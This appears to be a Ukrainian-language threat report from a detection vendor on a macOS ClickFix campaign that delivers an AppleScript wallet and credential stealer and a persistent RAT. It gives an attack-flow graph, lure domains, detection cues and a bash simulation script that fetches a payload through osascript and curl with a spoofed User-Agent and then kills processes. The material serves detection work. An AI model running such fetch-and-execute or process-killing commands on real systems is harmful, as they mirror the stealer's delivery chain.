macOS ClickFix наживки розгортають AppleScript-викрадач та стійкий RAT

SOC Prime Team

Стежити

macOS ClickFix наживки розгортають AppleScript-викрадач та стійкий RAT

Detection stack

AIDR
Alert
ETL
Query

Звіт про загрози
Потік атаки
Виявлення
Симуляції

Резюме

Загрозливий об’єкт, що говорить російською мовою, використовує соціальну інженерію ClickFix для розгортання двоетапної інфекції шкідливого ПЗ для macOS. Атака починається з безфайлового ланцюжка виконання, запущеного через термінальні команди, та доставляє інфостилер на основі AppleScript під назвою Meow (DEBUG), а також троян для постійного дистанційного доступу. Шкідливе ПЗ спрямоване на криптовалютні гаманці, облікові дані браузера та дані сеансів повідомлень, а також виконує нав’язливу ін’єкцію коду в настільні додатки для гаманців.

Розслідування

Netskope Threat Labs виявив оновлену версію кампанії 31 травня 2026 року, яка свідчить про перехід від простого стилера до більш потужного RAT. Їхній аналіз показав складну безфайлову інфекцію, логіку геофенсінгу, призначену для уникнення російськомовних жертв, та спорадичне пере-підписування, яке використовується для обходу захисту macOS Gatekeeper. Дослідники також пов’язали кампанію з 25 короткотривалими доменами-приманками, що мали однакову контактну інформацію реєстратора.

Мітигація

Захисники повинні пріоритизувати блокування доменів-приманок та моніторинг підозрілих термінальних команд, які містять curl and osascript. Організації повинні застосувати жорсткіший контроль над доступом до терміналу та слідкувати за несанкціонованими змінами в пакетах додатків криптограманців. Детекція на хостах може також фокусуватись на списках plist для збереження com.apple.accountsd та /tmp/shub_ схеми підготовки.

Відповідь

Якщо цю активність виявлено, негайно ізолюйте уражений хост macOS, щоб зупинити подальше викрадення даних або можливе бічне переміщення. Всі встановлені настільні криптовалютні гаманці слід розглянути як скомпрометовані та перевстановити з надійних джерел. Дослідники повинні також провести судово-медичний огляд LaunchDaemons та LaunchAgents на предмет несанкціонованих записів, з особливою увагою до com.apple.accountsd.

"graph TB %% Визначення класів classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef persistence fill:#99ff99 classDef exfiltration fill:#ffff99 %% Ініціальний доступ та виконання attack_drive_by["Дія – Компрометація прапором Жертви заходять на шкідливі домени-приманки наприклад, filesapphirecanvas.sbs або filemintcastle.sbs, що маскуються під корисності для macOS або збереження на GitHub."] class attack_drive_by action attack_user_exec_copy["Дія – Користувацьке виконання: Шкідливе копіювання та вставка Соціальна інженерія жертв для копіювання команд з фейкових сайтів в Термінал macOS."] class attack_user_exec_copy action attack_obfuscation["Дія – Замасковані файли або інформація: Вбудовані навантаження Використовує стиснуті gzip та закодовані base64 heredoc для запуску завантажувача першої стадії в пам'яті."] class attack_obfuscation action %% Логіка завантажувача та обмеження loader_stage1["Процес – Завантажувач в пам'яті Виконується через замаскований ланцюжок команд щоб уникнути сліду на диску."] class loader_stage1 tool guardrail_geofence["Дія – Виконання обмежень: Взаємне виключення Перевіряє розкладку клавіатури macOS щоб уникнути користувачів, що говорять російською, через логіку геофенсінгу."] class guardrail_geofence action loader_reflective["Дія – Рефлексивне завантаження коду Отримує AppleScript другого ступеня через curl та передає його прямо в пам'ять osascript."] class loader_reflective action %% Навантаження та крадіжка облікових даних malware_meow["Шкідливе ПЗ – Навантаження Meow Навантаження в пам'яті активне після рефлексивного завантаження."] class malware_meow malware attack_gui_capture["Дія – Захоплення вводу: Захоплення вводу GUI Використовує підроблений діалог Налаштувань системи для збору паролів входу користувача."] class attack_gui_capture action attack_securityd["Дія – Облікові дані з сховищ паролів: Пам'ять Securityd Розблокує зв'язку macOS щоб витягнути ключі безпечного сховища, використовючи зібрані паролі."] class attack_securityd action %% Викрадення даних та ексфільтрація attack_browser_discovery["Дія – Відкриття інформації браузера Сканує дані браузера в межах Chrome, Safari та Firefox."] class attack_browser_discovery action attack_session_steal["Дія – Крадіжка сесійної куки для веб-сесії Викрадає сесійні файли cookie щоб підтримувати несанкціонований доступ."] class attack_session_steal exfiltration attack_crypto_theft["Дія – Фінансова крадіжка Спрямована на криптовалютні гаманці, в тому числі розширення MetaMask і додатки для настільних ПК на зразок Exodus і Ledger."] class attack_crypto_theft exfiltration %% Сталість та C2 persistence_launch["Стійкість – LaunchAgent або LaunchDaemon Створює стійкий механізм замаскований як com.apple.accountsd."] class persistence_launch persistence c2_beaconing["Дія – Командування та контроль Встановлює 60-секундний цикл маячення з динамічним дозволенням для виконання довільного коду."] class c2_beaconing tool %% Зв'язки attack_drive_by –>|призводить до| attack_user_exec_copy attack_user_exec_copy –>|запускає| attack_obfuscation attack_obfuscation –>|виконує| loader_stage1 loader_stage1 –>|виконує| guardrail_geofence guardrail_geofence –>|дозволяє| loader_reflective loader_reflective –>|завантажує| malware_meow malware_meow –>|виконує| attack_gui_capture attack_gui_capture –>|сприяти| attack_securityd attack_securityd –>|призводить до| attack_browser_discovery attack_browser_discovery –>|призводить до| attack_session_steal attack_browser_discovery –>|призводить до| attack_crypto_theft malware_meow –>|встановлює| persistence_launch malware_meow –>|спілкується з| c2_beaconing "

Хід атаки

Опис атаки та команди: Супротивник отримав початковий доступ через шкідливий вебсайт. Вони виконують безфайловий AppleScript для macOS для обходу сканування, заснованого на файлах. Мета сценарію полягає у завантаженні вторинного навантаження шляхом підробки агентів користувача браузера Chrome для обходу базового мережевого огляду і тоді негайно завершити всі робочі програми криптовалюти, щоб запобігти користувачеві зберегти свої кошти. Атакуючий використовує osascript щоб викликати curl з конкретними прапорами і kill -9 для виконання цих дій.

Скрипт регресійного тестування:

#!/bin/bash
# Симуляція безфайлового macOS AppleScript Stealer

echo "[+] Початок симуляції: безфайловий macOS Stealer"

# Крок 1: Симулюйте отримання навантаження через osascript (запускає selection_curl_ua)
echo "[+] Виконання стадії 1: Підроблений Curl через osascript..."
osascript -e 'do shell script "curl -k -s --max-time 30 -H "User-Agent: Mozilla/5.0" http://localhost:8080/payload"' 2>/dev/null &

# Почекайте трохи для створення процесу
sleep 2

# Крок 2: Симуляція завершення процесу (запускає selection_kill)
# Ми використовуємо фіктивний процес для завершення, щоб не порушити систему
echo "[+] Виконання стадії 2: Завершення процесу через osascript..."
sleep 1
osascript -e 'do shell script "kill -9 $$"' # Увага: Це вб'є поточний підключ, імітуючи наміри

# Увага: Для чистішої симуляції, яка імітує реальну цільову:
# sleep 1 && sleep 1 & 
# osascript -e 'do shell script "kill -9 $!"'

echo "[+] Симуляційні команди надіслані."

Команди очистки:

# Скрипт не створив файлів, але ми гарантуємо, що не залишилося фонових процесів.
killall osascript 2>/dev/null
echo "[+] Очищення завершено."

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно